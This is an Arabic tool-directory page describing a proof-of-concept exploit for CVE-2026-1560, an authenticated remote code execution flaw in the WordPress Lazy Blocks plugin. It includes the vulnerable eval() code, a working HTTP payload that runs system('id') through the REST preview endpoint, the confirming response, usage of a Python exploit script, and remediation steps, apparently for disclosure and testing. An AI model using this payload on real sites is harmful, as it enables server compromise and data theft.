Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0 — إثبات مفهوم لاستغلال CVE-2026-1560، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد تتطلب مصادقة في إضافة Lazy Blocks الخاصة بووردبريس، مما يسمح للمستخدمين ذوي الصلاحيات المنخفضة بتنفيذ أكواد PHP عشوائية عبر REST API. | Kitploit
أدوات/GitHubGitHub/z3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubz3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0

CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0

إثبات مفهوم لاستغلال CVE-2026-1560، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد تتطلب مصادقة في إضافة Lazy Blocks الخاصة بووردبريس، مما يسمح للمستخدمين ذوي الصلاحيات المنخفضة بتنفيذ أكواد PHP عشوائية عبر REST API.

عرض المستودع
2منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-1560 – تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة في Custom Block Builder – Lazy Blocks ≤ 4.2.0

الباحث: ZeYrOXxx

الملحق: Custom Block Builder – Lazy Blocks

الإصدارات المتأثرة: ≤ 4.2.0

الخطورة: عالية

CVSS: 8.8

نوع الثغرة: تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة (RCE)

ناقل الهجوم: REST API

الصلاحية المطلوبة: edit_posts (مساهم Contributor+)


المراجع

  • استشارة Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lazy-blocks/custom-block-builder-lazy-blocks-420-authenticated-contributor-remote-code-execution

الملخص التنفيذي

تم تحديد ثغرة أمنية عالية الخطورة في ملحق WordPress الخاص بـ Custom Block Builder – Lazy Blocks والتي تؤثر على الإصدارات حتى 4.2.0 ضمناً.
تسمح هذه الثغرة للمستخدمين المصادق عليهم بصلاحيات منخفضة (دور المساهم Contributor) بتنفيذ كود PHP عشوائي على الخادم عبر نقطة نهاية REST API مخصصة لوظيفة معاينة الكتل.

هذه المشكلة تكسر نموذج الصلاحيات في WordPress بشكل كامل وقد تؤدي إلى اختراق كامل للخادم.


نقطة النهاية المعرضة للخطر

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/

يمكن الوصول إلى نقطة النهاية من قبل أي مستخدم مصادق عليه يمتلك صلاحية edit_posts.


التفاصيل الفنية

فحص الصلاحيات

يتم تسجيل مسار REST مع استدعاء صلاحيات ضعيف:

root@kitploit:~
'permission_callback' => array( $this, 'block_builder_preview_permission' )

وهذا يشمل المساهمين Contributors، الذين لا ينبغي أبداً السماح لهم بتنفيذ كود PHP.


مسار الكود المعرض للخطر

وحدة تحكم REST – classes/class-rest.php

root@kitploit:~
$block = $request->get_param( 'block' );

$block_result = lazyblocks()->blocks()->render_callback(
    $attributes,
    null,
    null,
    $context,
    $block_data
);

عارض الكتل – classes/class-blocks.php

root@kitploit:~
public function php_eval( $code, $attributes, $context ) {
    ob_start();
    eval( '?>' . $code );
    return ob_get_clean();
}

تقوم دالة eval() بتنفيذ كود PHP يتحكم فيه المهاجم دون أي تنقية أو تحقق.


تحليل السبب الجذري

يسمح Lazy Blocks بمنطق عرض PHP مخصص للكتل.
تقبل نقطة نهاية معاينة REST API تعريفات كتل مقدمة من المستخدم ولا تميز بين الكتل المخزنة الموثوقة وكتل المعاينة التي يتحكم فيها المهاجم.

من خلال حقن سمات كتلة مسطحة مثل:

  • code_output_method
  • code_editor_html

يمكن للمهاجم الوصول إلى نقطة تنفيذ php_eval() وتشغيل كود PHP عشوائي.


إثبات المفهوم (HTTP)

الطلب:

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/ HTTP/1.1
Host: example.com
Content-Type: application/json
Authorization: Basic [بيانات_اعتماد_المساهم]

{
    "context": "editor",
    "block": {
        "slug": "exploit-block",
        "code_output_method": "php",
        "code_editor_html": "<?php echo 'VULNERABLE: ' . system('id'); ?>"
    }
}

الاستجابة:

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: application/json

{
    "success": true,
    "response": "<div useBlockProps>VULNERABLE: uid=33(www-data)...</div>"
}

✔ تم تأكيد تنفيذ الأوامر التعسفية


يتم توفير إثبات المفهوم هذا حصرياً لأغراض الاختبارات الأمنية والبحث.


التأثير

يمكن للمهاجم الذي يمتلك وصولاً بصلاحية المساهم Contributor القيام بما يلي:

  • تنفيذ أوامر نظام تعسفية
  • قراءة ملفات حساسة (مثل wp-config.php)
  • تعديل ملفات مصدر PHP
  • تصعيد الصلاحيات إلى مسؤول
  • اختراق مثيل WordPress بالكامل

المعالجة

  • تقييد عرض PHP على المسؤولين فقط
  • إزالة استخدام eval() على المدخلات التي يتحكم فيها المستخدم
  • منع معاينة REST للكتل التي تحتوي على كود PHP
  • طلب صلاحية manage_options أو unfiltered_html
  • استبدال تنفيذ PHP بآليات قوالب آمنة

الاستخدام (Python PoC)

المتطلبات

  • Python 3.x
  • مكتبة requests
  • بيانات اعتماد WordPress صالحة بصلاحية edit_posts (مساهم Contributor+)

تثبيت التبعيات

root@kitploit:~
pip install requests

تشغيل الاستغلال

root@kitploit:~
python3 poc.py <target_url> <username> <password> "<command>"

مثال

root@kitploit:~
python3 poc.py https://victim.site contributor password "id"

إذا كان الهدف معرضاً للخطر، سيتم إرجاع مخرجات الأمر في استجابة HTTP.

⚠️ إثبات المفهوم هذا مخصص حصرياً للاختبارات الأمنية المصرح بها وأغراض البحث.

تنزيل الأداة